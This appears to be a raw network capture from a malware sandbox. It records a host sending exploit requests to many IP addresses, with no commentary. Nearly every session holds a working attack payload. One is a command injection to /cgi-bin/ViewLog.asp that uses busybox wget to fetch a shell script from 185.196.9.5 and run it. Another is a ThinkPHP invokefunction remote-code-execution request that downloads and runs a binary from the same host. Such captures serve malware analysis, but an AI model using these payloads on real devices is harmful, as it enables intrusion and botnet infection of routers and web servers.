Feb 25, 2024 19:05:32.204603910 CET	711	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Sun, 25 Feb 2024 18:05:32 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: keep-alive X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src * data: blob: ws: wss: gap://ready file://; style-src 'unsafe-inline'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * ws: wss:; Strict-Transport-Security: max-age=31536000; includeSubDomains Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1209	192.168.2.15	39936	31.136.242.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.953108072 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:32.516635895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:33.604799986 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:35.972608089 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:40.324532986 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:49.028414965 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1210	192.168.2.15	56000	94.187.100.216	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.986109972 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1211	192.168.2.15	59740	31.200.5.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.995079041 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1212	192.168.2.15	41064	94.123.81.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.995071888 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1213	192.168.2.15	34978	94.181.33.52	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:32.030225992 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:32.268584967 CET	502	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:32 GMT Server: Apache Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1214	192.168.2.15	59412	31.136.144.14	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:32.524734974 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:35.716692924 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:41.860534906 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1215	192.168.2.15	52854	88.150.171.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:32.776340008 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:32.943068027 CET	500	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:32 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 306 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 38 2e 31 35 30 2e 31 37 31 2e 31 35 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 88.150.171.151 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1216	192.168.2.15	46786	88.221.0.89	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:32.812630892 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:33.016382933 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:32 GMT Date: Sun, 25 Feb 2024 18:05:32 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 39 34 63 64 62 31 37 26 23 34 36 3b 31 37 30 38 38 38 34 33 33 32 26 23 34 36 3b 64 32 39 65 62 31 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.594cdb17.1708884332.d29eb1c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1217	192.168.2.15	35382	88.129.112.117	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:32.822213888 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:33.037328959 CET	1286	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 70 72 61 67 6d 61 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 2d 63 61 63 68 65 27 3e 0a 3c 73 74 79 6c 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv='pragma' content='no-cache'><style type="text/css">span.title {font-size:1.2em;}table.pos {margin:0;width:100%;}table.real {margin-top:20px;margin-left:auto;margin-right:auto;w
Feb 25, 2024 19:05:33.037373066 CET	912	IN	Data Raw: 29 20 7b 0a 09 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 6e 61 6d 65 22 29 2e 66 6f 63 75 73 28 29 3b 0a 09 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 6e 61 Data Ascii: ) {document.getElementById("username").focus();document.getElementById("username").select();}</script></head><body onload="init()"><table class="pos"> <tr> <td id="pos_td"><span class="title">Inteno XG6846</span><f

Session ID	Source IP	Source Port	Destination IP	Destination Port
1218	192.168.2.15	44296	95.217.182.167	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:33.007833958 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:33.203104019 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
1219	192.168.2.15	41192	94.247.163.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.740227938 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1220	192.168.2.15	35392	88.129.112.117	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.763468027 CET	395	IN	HTTP/1.1 400 Bad Request Server: micro_httpd Cache-Control: no-cache Date: Sun, 25 Feb 2024 19:05:33 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 61 61 61 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No aaa request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1221	192.168.2.15	51658	95.111.100.48	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.766346931 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:34.970740080 CET	259	IN	HTTP/1.1 404 Not Found Server: WebServer Date: Wed, 05 Jan 2000 00:03:24 GMT Content-Type: text/html Content-Length: 110 Connection: close Data Raw: 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1222	192.168.2.15	45312	31.200.1.137	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.787349939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1223	192.168.2.15	52292	94.121.124.175	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.787528992 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1224	192.168.2.15	46362	94.120.244.37	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.788450003 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1225	192.168.2.15	43044	94.123.24.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:34.789449930 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1226	192.168.2.15	33274	94.122.62.152	8080

Timestamp	Bytes transferred	Direction	Data
